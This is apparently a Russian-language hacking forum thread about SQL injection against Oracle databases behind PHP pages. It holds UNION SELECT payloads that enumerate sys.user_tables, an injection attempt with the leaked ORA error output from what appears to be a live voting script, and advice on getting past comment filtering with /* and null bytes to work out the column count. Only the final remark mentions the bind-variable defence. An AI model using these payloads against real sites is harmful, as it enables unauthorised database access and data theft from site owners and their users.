Интересный факт, не знаю на сколько будет полезно но: запрос

www.site.com/view.php?id=-1+union+select+null, table_name, null, null+from+sys.user_tables+where+rownum+<=+5--

выдавал пустую страничкy, а запрос

www.site.com/view.php?id=-1+UNION+SELECT+null, TABLE_Name, null, null+FROM+SYS.USER_TABLES+WHERE+ROWNUM+<=+5--

выводил нужную информацию на страничкy

З.Ы. Спасибо за предоставленую инфу по ораклу...

eсть вот такая вещь, как с ней бороться??Как подобрать кол-во столбцов?
BD Oracle
получил с помощбю post запроса www.site.ru/vote/statistic.php?lang=kaz&vote=1&question_id=1122031291')--+&answer_id=1122031391&vote_bt.x=21&vote_bt.y=11


Warning: ociexecute() [function.ociexecute]: ORA-01785: ORDER BY item must be the number of a SELECT-list expression in /export/htdocs/oracle.php on line 48
SELECT * FROM voting_questions WHERE id = '1122031291\' order by 99999--'
Warning: ocifetchinto() [function.ocifetchinto]: ORA-24374: define not done before fetch or execute and fetch in /export/htdocs/oracle.php on line 56

буду ОЧЕНЬ признателен за помощь!

это вообще за инъекцию сойдёт???Как можно подобрать кол-во колонок?

У тебя комментирование "--" запроса не прошло. Скул говорит, что "group by 99999--" - должно быть целым числом, а не с "--". Попробуй "/*" и нулл-байт %00, мало ли.

Вообще, я удивлен, наличием php скриптов с sql инъекцией под оракл... нужно сильно постараться написать такой код, когда есть функция OCIBindByName, использование которой сводит возможность инъекции на нет.